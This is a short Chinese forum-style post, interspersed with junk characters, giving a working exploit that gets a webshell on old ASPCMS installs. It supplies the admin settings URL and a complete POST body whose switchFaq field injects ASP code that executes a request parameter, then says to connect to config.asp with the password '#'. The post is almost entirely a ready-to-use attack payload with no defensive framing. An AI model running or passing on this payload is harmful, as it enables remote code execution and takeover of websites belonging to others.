老的ASPCMS版本的秒杀拿SHELL漏洞6 P" Q3 L8 y- i4 O& `
) t$ {* x8 @! {. R9 x; C+ N, y4 S
找到后台。。。然后, V* ~$ e8 V# o0 g- N6 g
- p: J0 z9 ?; P4 [/admin/_system/AspCms_SiteSetting.asp?action=saves
: o1 O+ o0 u) E$ n2 O8 H5 A: [9 @, d " e1 c/ M% ?7 ]4 w5 ~2 N
直接POST
* ~$ { y1 s0 n4 x4 ?! t , K }: x: i- J* @
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1- x( M2 ?* D1 J# _5 `* ^
/ d1 C$ \# |* `7 A& x' |# M) C
再连接配置文件config.asp 密码为#
4 l U: q t6 z8 O* B |